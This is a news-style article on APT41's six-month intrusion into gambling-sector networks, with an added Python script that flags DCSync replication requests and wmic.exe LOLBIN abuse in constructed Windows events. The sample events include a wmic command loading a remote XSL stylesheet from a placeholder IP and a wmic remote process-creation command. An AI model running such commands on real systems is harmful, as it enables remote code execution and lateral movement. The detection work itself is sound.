The notorious Chinese nation-state hacking group, APT41—also referred to as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti—has been linked to a well-planned cyberattack on the gambling and gaming industries. Over a span of six months, the attackers quietly gathered sensitive information, including network configurations, user passwords, and data extracted from the LSASS process, according to Ido Naor, CEO of Israeli cybersecurity firm Security Joes.
Throughout the breach, the attackers consistently upgraded their tools, adjusting them in response to the security team’s efforts. This continuous adaptation allowed them to stay under the radar and maintain control of the compromised network for nearly nine months. This attack shows parallels with a previous campaign, known as Operation Crimson Palace, which has been tracked by cybersecurity firm Sophos.
While many state-sponsored cyberattacks have political or espionage motives, Security Joes believes this attack was driven by financial interests. Naor revealed that the campaign appears to have been designed for monetary gain, with APT41 using stealth tactics and customized tools to evade detection and establish persistent remote access. Once inside the network, they reportedly executed a DCSync attack to collect service and admin password hashes, extending their control over critical accounts.
Although the exact method of initial entry remains unclear, spear-phishing is suspected, given the lack of active vulnerabilities in public-facing web applications. Once the network was breached, APT41 relied on techniques like Phantom DLL Hijacking and the legitimate wmic.exe utility to achieve their goals. They exploited administrator privileges from service accounts to execute additional malicious code, further entrenching themselves within the infrastructure.
A notable second stage of the attack involved delivering a malicious DLL file—TSVIPSrv.dll—through the SMB protocol, which then communicated with a hard-coded command-and-control (C2) server. If the initial C2 server failed, the malware cleverly updated itself by scraping GitHub to find new C2 server details, extracting capitalized letters from HTML results to generate the IP address.
Security Joes reports that after their activities were detected, the attackers went silent for weeks, only to return later with more obfuscated and advanced techniques. Their use of the LOLBIN utility wmic.exe to execute malicious JavaScript code further highlights their adaptability. The attack was particularly targeted, focusing on machines with IP addresses containing ‘10.20.22,’ which narrowed their reach to specific VPN subnet devices.
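Two of the behaviours described above, the DCSync collection of password hashes and the use of wmic.exe as a LOLBIN, leave recognisable traces in Windows Security auditing. The following is an added detection example written for this article, not code from Security Joes or from the reported intrusion. It runs over a handful of constructed events: Event ID 4662 (directory object access, which records the replication extended rights a DCSync request exercises) and Event ID 4688 (process creation with command-line auditing enabled). The domain controller allowlist, account names, hosts and command lines are all assumptions made for the example.

```python
"""Hunt over constructed Windows Security events for two behaviours the
article attributes to the intrusion: DCSync-style replication requests
(Event ID 4662) and wmic.exe used as a LOLBIN (Event ID 4688).
Every event, account and host below is constructed for this example."""
import re
from dataclasses import dataclass, field

# Extended-right GUIDs exercised by a directory replication request. A DCSync
# asks for Get-Changes together with Get-Changes-All (or the filtered-set right).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Assumed allowlist of domain controller machine accounts that replicate
# legitimately (placeholder names, not taken from the article).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# wmic.exe anywhere on the command line, with or without a path.
WMIC_BINARY = re.compile(r"\bwmic(\.exe)?\b", re.I)
# /format: pointing at an external stylesheet (URL or .xsl file) instead of a
# built-in formatter such as list, csv or table. XSL stylesheets can carry script.
EXTERNAL_XSL = re.compile(r"/format:\s*[\"']?(https?://\S+|\S+\.xsl)", re.I)
# Process creation on another host via /node:.
REMOTE_PROCESS = re.compile(r"/node:\S+.*\bprocess\b.*\bcall\b.*\bcreate\b", re.I)


@dataclass
class Event:
    event_id: int
    subject: str                                   # SubjectUserName
    properties: set = field(default_factory=set)   # 4662: requested access-right GUIDs
    command_line: str = ""                         # 4688: full command line


def classify(ev: Event) -> list[str]:
    """Return the detection labels that apply to one event (empty if benign)."""
    hits: list[str] = []
    if ev.event_id == 4662:
        requested = {g.lower() for g in ev.properties}
        # Replication rights requested by anything other than a known DC account.
        if requested & REPLICATION_GUIDS and ev.subject.upper() not in KNOWN_DC_ACCOUNTS:
            hits.append("dcsync_from_non_dc_account")
    elif ev.event_id == 4688 and WMIC_BINARY.search(ev.command_line):
        if EXTERNAL_XSL.search(ev.command_line):
            hits.append("wmic_external_stylesheet")
        if REMOTE_PROCESS.search(ev.command_line):
            hits.append("wmic_remote_process_create")
    return hits


def hunt(events: list[Event]) -> list[tuple[int, str, list[str]]]:
    """Return (index, subject, labels) for every event that triggered a detection."""
    flagged = []
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            flagged.append((i, ev.subject, labels))
    return flagged


# Constructed sample telemetry: two replication requests and four process creations.
SAMPLE_EVENTS = [
    Event(4662, "DC02$", properties={"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}),
    Event(4662, "svc_backup", properties={"1131F6AA-9C07-11D1-F79F-00C04FC2DCD2",
                                          "1131F6AD-9C07-11D1-F79F-00C04FC2DCD2"}),
    Event(4688, "helpdesk", command_line="wmic os get Caption /format:list"),
    Event(4688, "svc_deploy", command_line=(
        'C:\\Windows\\System32\\wbem\\WMIC.exe process get brief '
        '/format:"http://192.0.2.10/p.xsl"')),
    Event(4688, "svc_deploy", command_line=(
        'wmic /node:10.20.22.15 process call create "notepad.exe"')),
    Event(4688, "helpdesk", command_line="powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for index, subject, labels in hunt(SAMPLE_EVENTS):
        print(f"event[{index}] subject={subject}: {', '.join(labels)}")
```

The DCSync rule keys on who asks for replication rights rather than on the rights alone, because domain controllers request them constantly; an allowlist of DC machine accounts keeps the rule quiet on normal replication and loud on a service account doing the same. The wmic.exe rules ignore the built-in formatters so routine inventory commands do not fire.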
This operation showcases APT41’s ability to blend espionage with financially motivated intrusions, reflecting the growing sophistication of state-sponsored cybercriminals who can quickly adjust to changing defenses while leaving a devastating impact on their targets.
Conclusion
APT41’s relentless and adaptive methods in infiltrating the gambling sector underscore the severe threat posed by nation-state actors with financial motives. Their use of evolving tactics and targeting of specific infrastructure highlights the urgent need for stronger defenses against these sophisticated attacks.